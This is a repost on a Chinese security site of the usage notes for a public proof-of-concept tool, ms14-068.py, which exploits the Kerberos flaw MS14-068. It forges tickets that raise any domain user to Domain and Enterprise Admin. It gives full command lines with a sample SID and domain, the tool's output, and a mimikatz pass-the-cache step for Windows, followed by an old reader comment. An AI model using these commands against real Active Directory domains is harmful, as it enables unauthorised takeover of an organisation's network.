MS14-068 privilege escalation PoC: 可以让任何域内用户提升为域管理员

admin
admin
admin
101398
文章
87
评论
2021年4月2日20:28:05评论67 views字数 1385阅读4分37秒阅读模式

ms14-068.py

Exploits MS14-680 vulnerability on an un-patched domain controler of an Active Directory domain to get a Kerberos ticket for an existing domain user account with the privileges of the following domain groups :

Domain Users (513)

Domain Admins (512)

Schema Admins (518)

Enterprise Admins (519)

Group Policy Creator Owners (520)

USAGE: 

ms14-068.py -u @ -s  -d  

OPTIONS: 
    -p  
--rc4  
Example usage : 

Linux (tested with samba and MIT Kerberos) 

root@kali:~/sploit/pykek# python ms14-068.py -u [email protected] -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
 Password: 
  [+] Building AS-REQ for dc-a-2003.dom-a.loc... Done! 
  [+] Sending AS-REQ to dc-a-2003.dom-a.loc... Done! 
  [+] Receiving AS-REP from dc-a-2003.dom-a.loc... Done! 
  [+] Parsing AS-REP from dc-a-2003.dom-a.loc... Done! 
  [+] Building TGS-REQ for dc-a-2003.dom-a.loc... Done! 
  [+] Sending TGS-REQ to dc-a-2003.dom-a.loc... Done! 
  [+] Receiving TGS-REP from dc-a-2003.dom-a.loc... Done! 
  [+] Parsing TGS-REP from dc-a-2003.dom-a.loc... Done! 
  [+] Creating ccache file '[email protected]'... Done! 
root@kali:~/sploit/pykek# mv [email protected] /tmp/krb5cc_0

On Windows 

python.exe ms14-068.py -u [email protected] -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
 mimikatz.exe "kerberos::ptc [email protected]" exit`

from: https://github.com/bidord/pykek

留言评论(旧系统):

0.0 @ 2014-12-07 21:48:55

核总 我总是在浏览您网站的时候偶尔无法访问 怀疑是被ban了IP 是不是短时间内浏览内容过多0.0

本站回复:

额,可能是~

文章来源于lcx.cc:MS14-068 privilege escalation PoC: 可以让任何域内用户提升为域管理员

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月2日20:28:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   MS14-068 privilege escalation PoC: 可以让任何域内用户提升为域管理员http://cn-sec.com/archives/317434.html

发表评论

匿名网友 填写信息